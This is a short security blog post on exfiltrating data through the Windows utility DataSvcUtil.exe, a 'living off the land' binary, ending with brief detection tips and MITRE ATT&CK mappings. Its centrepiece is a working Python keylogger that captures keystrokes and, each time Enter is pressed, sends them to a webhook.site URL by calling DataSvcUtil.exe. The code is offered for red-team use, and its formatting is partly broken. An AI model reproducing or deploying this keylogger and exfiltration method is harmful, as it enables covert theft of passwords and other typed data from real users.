Data Exfiltration with LOLBins [part 2]

movq %rax,%rax
3 min readDec 3, 2020

--

When it comes to data exfiltration, creativity and thinking outside the box is the most important. To remember; The term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Greaber to explain the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts. [see more]

This time, I managed to find another unexpected way using WCF Data Service Client Utility (DataSvcUtil.exe), DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. This utility can generate data classes.

The DataSvcUtil.exe tool is installed in the .NET Framework directory. In many cases, this is located in:

  • C:\Windows\Microsoft.NET\Framework\v4.0.

For 64-bit systems, this is located in:

  • C:\Windows\Microsoft.NET\Framework64\v4.0.

You can also access the DataSvcUtil.exe tool from Developer Command Prompt for Visual Studio.

Syntax:

datasvcutil /out:file [/in:file | /uri:serviceuri] [/dataservicecollection] [/language:devlang] [/nologo] [/version:ver] [/help]

/uri:serviceuri — At this point you need to insert the URL containing the data that will be exfiltrated
Event with webhook.site

Now, a piece of code to help readteam usage 🐦

# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocessURL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
content = ""def on_press(key):
global content
global URL
global uploader
if str(key) == 'Key.backspace':
content += ' '
else:
content += str(key)print(f'last key: {str(key)}')
print("")if str(key) == 'Key.enter':
upload_url = (f'{URL}?{content}')
subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
buffer = ''if key == 0x03:
sys.exit(0)if __name__ == "__main__":
try:
with Listener(on_press=on_press) as listener:
listener.join()
except (KeyboardInterrupt, SystemExit):
sys.exit(0)

BlueTeam friends ↪️🕵↩️:

  • Preventing/Detecting DataSvcUtil.exe with non-RFC1918 addresses by Network IPS/IDS
  • Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.exe

MITRE ATT&CK Techniques:

  • ID: T1567
  • Sub-techniques: T1567.001, T1567.002
  • Tactic: Exfiltration
  • Requires Network: Yes
  • Platforms: Linux, Windows, macOS
  • Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection

--

--

movq %rax,%rax

reverse engineering and malware tales\\ Linkedin@isdebuggerpresent\\